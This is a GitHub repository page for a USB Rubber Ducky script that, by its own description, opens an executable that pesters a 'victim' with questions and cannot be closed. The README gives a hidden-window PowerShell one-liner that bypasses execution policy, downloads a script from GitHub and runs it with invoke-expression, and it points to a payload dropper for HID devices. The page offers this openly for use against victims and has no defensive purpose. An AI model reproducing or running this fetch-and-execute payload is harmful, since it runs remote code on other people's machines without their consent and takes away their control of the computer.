Skip to content
/ pop-ups Public

USB rubber ducky script to open .exe file and ask a series of questions without victim being able to close the .exe

Notifications You must be signed in to change notification settings

d0cax/pop-ups

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

20 Commits
 
 
 
 
 
 
 
 

Repository files navigation

alt text

pop-ups.ps1

Description

A script to run a .exe file which asks multiple questions to victim without being able to be closed.

powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https://raw.githubusercontent.com/d0cax/pop-ups/main/PopUps.ps1?dl=1; invoke-expression $pl

Usage

Check out my payload dropper for HIDs or digisparks for this script.

Acknowledgments

About

USB rubber ducky script to open .exe file and ask a series of questions without victim being able to close the .exe

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published